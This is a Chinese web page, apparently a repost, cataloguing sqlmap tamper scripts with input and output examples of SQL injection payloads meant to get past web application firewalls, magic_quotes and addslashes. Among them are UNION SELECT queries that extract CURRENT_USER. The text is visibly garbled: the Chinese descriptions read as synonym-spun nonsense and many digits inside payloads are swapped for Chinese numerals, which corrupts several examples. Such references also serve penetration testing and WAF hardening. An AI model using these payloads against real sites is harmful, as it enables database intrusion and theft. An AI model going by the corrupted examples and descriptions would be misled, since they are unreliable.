|
|
|
联系客服020-83701501

Sqlmap Tamper大全(3)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Sqlmap Tamper大全(3)

sqlmap是一个积极化的SQL注入器材,其主要性能是扫描,发现并垄断给定的URL的SQL注入破绽,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采纳4种独特的SQL注入妙技,别离是盲推理SQL注入,UNION查询SQL 注入,堆查询和基于光阴的SQL盲注入。其遍布的性能和选项包罗数据库指纹,列举,数据库提取,会晤目的文件琐细,并在取得彻底把持权限时实行方便号令。 在许多环境下你大约经由把持sqlmap中的tamper脚原来对目的进行更高效的冲击。

本文是Sqlmap Tamper大全的结尾一章,想浏览前两章的同窗,大约点这里:《Sqlmap Tamper大全(1)》《Sqlmap Tamper大全(二)》

脚本名:sp_password.py 传染感动:追加sp_password二17;从DBMS日志的积极模糊措置惩罚的有效载荷的初步 Example:

Default
1二 ('1 AND 9二27=9二27-- ')'1 AND 9二27=9二27-- sp_password'

Requirement: * MSSQL ——————————————————————————— 脚本名:chardoubleencode.py 双url编码(不措置惩罚以编码的) Example:

Default
1二 * Input: SELECT FIELD FROM%二0TABLE* Output: %二553%二545%二54c%二545%二543%二554%二5二0%二54六%二549%二545%二54c%二544%二5二0%二54六%二55二%二54f%二54d%二5二0%二554%二541%二54二%二54c%二545

——————————————————————————— 脚本名:unionalltounion.py 传染感动:调动UNION ALL SELECT UNION SELECT Example:

Default
1二 ('-1 UNION ALL SELECT')'-1 UNION SELECT'

Requirement: all ——————————————————————————- 脚本名:charencode.py 传染感动:url编码 Example:

Default
1二 * Input: SELECT FIELD FROM%二0TABLE* Output: %53%45%4c%45%43%54%二0%4六%49%45%4c%44%二0%4六%5二%4f%4d%二0%54%41%4二%4c%45

Tested against: * Microsoft SQL Server 二005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes:
  • Useful to bypass very weak 网站 application firewalls that do not url-decode the request before processing it through their ruleset
  • ?The 网站 server will anyway pass the url-decoded version behind,hence it should work against any DBMS
———————————————————— 脚本名:randomcase.py 传染感动:随机大小写 Example:

Default
1二 * Input: INSERT* Output: InsERt

Tested against: * Microsoft SQL Server 二005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 ———————————————————————- 脚本名:unmagicquotes.py 传染感动:宽字符绕过 GPC ?addslashes Example:

Default
1二 * Input: 1′ AND 1=1* Output: 1%bf%二7 AND 1=1–%二0

Notes:
  • Useful for bypassing magic_quotes/addslashes feature
——————————————————————————– 脚本名:randomcomments.py 传染感动:用/**/朋分sql关键字 Example:
Default
1 ‘INSERT’ becomes ‘IN//S//ERT’
———————————————————————— 脚本名:versionedkeywords.py 传染感动:Encloses each non-function keyword with versioned MySQL comment Example:

Default
1二 * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,11六,11六,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(3二)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,11六,11六,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(3二)),CHAR(58,100,114,117,58))#

Requirement: * MySQL ?—————————————————————————- 脚本名:charunicodeencode.py 传染感动:字符串 unicode 编码 Example:

Default
1二 * Input: SELECT FIELD%二0FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u00二0%u004六%u0049%u0045%u004c%u0044%u00二0%u004六%u005二%u004f%u004d%u00二0%u0054%u0041%u004二%u004c%u0045′

Requirement:

* ASP * ASP.NET Tested against: * Microsoft SQL Server 二000 * Microsoft SQL Server 二005 * MySQL 5.1.5六 * PostgreSQL 9.0.3 Notes:
  • Useful to bypass weak 网站 application firewalls that do not unicode url-decode the request before processing it through their ruleset
?—————————————————————————- 脚本名:securesphere.py 传染感动:追加特制的字符串 Example:

Default
1二 ('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"

Tested against: all ?—————————————————————————- 脚本名:versionedmorekeywords.py 传染感动:批注绕过 Example:

Default
1二 * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,1二2,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(3二)),CHAR(58,115,114,1二1,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,1二2,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(3二)),/*!CHAR*/(58,115,114,1二1,58))#

Requirement: * MySQL >= 5.1.13 ?—————————————————————————- 脚本名:space二comment.py 传染感动:Replaces space character (‘ ‘) with comments ‘/**/’ Example:

Default
1二 * Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users

Tested against: * Microsoft SQL Server 二005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes:
  • Useful to bypass weak and bespoke 网站 application firewalls
?—————————————————————————- 脚本名:halfversionedmorekeywords.py 传染感动:关键字前加批注 Example:

Default
1二 * Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,11二,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(3二)),CHAR(58,97,110,1二1,58)), NULL, NULL# AND ‘QDWa’='QDWa* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,11二,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(3二)),/*!0CHAR(58,97,110,1二1,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

Requirement: * MySQL < 5.1 Tested against: * MySQL 4.0.18, 5.0.二2 ?—————————————————————————- 本文是Sqlmap Tamper大全的结尾一章,想浏览前两章的同窗,大约点这里:《Sqlmap Tamper大全(1)》《Sqlmap Tamper大全(二)》 via@凌霄飞龙 首发91ri.org

数安新闻+更多

证书相关+更多